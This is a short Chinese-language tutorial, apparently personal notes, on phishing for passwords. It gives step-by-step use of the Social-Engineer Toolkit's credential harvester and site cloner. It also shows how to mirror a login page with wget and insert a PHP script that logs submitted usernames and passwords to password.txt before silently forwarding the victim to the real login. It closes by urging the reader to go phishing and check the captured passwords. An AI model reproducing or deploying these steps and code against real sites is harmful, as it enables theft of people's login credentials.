SET

使用SET社会工程学工具包钓鱼收集密码

$->setoolkit

1.选择选项1社会工程学攻击，回车

2.然后选择Website Attack Vectors

3.选择Credential Harvester Attack Method

4.选择Site Cloner

5.它会询问收集到的证书发到哪个IP，输入kali攻击主机的IP

6.下面它会询问，要克隆的URL，输入我们要克隆的页面URL

7.在浏览器测试访问kali攻击主机

8.回到终端输入收集器文件保存的目录，默认为

/var/www/html

cd /var/www/html

9.假设有结果文件rs.txt,查看他的内容 cat rs.txt

使用之前保存的页面创建钓鱼网站

wget -r -p bodgeit_offline/http://192.168.0.100/bodgeit

将下载的站点复制到kali中apache的根目录，在root终端中

cp -r bodgeit_offline/192.168.0.100/bodgeit /var/www/html/`

之后我们启动Apache服务 service Apache start

然后我们需要更新我们的界面，使他重定向到我们手机密码的脚本:

打开bodgeit目录中的login.jsp文件找到form表单的的代码，添加action=“post.php”

<?php
$file='password.txt';
file_put_contents($file,print_r($_POST,true),FILE_APPEND);
$username=$_POST['username'];
$password=$_POST['password'];
$submit="Login";
?>
<body onload="frm1.submit.click()">
<form name="frm1" id="frm1" method="POST" action="kali主机的钓鱼登录页面">
<input type="hidden" value="<?php echo $username;?> name="username" ">
<input type="hidden" value="<?php echo $password;?> name="password" ">
<input type="submit" value="<?php echo $submit;?> name="submit" ">
</form>
</body>

密码会存放到 password.txt 这个文件中，我们要给它权限

touch password.txt
chown www-data password.txt

去钓鱼喽，然后回来检查密码文件

cat password.txt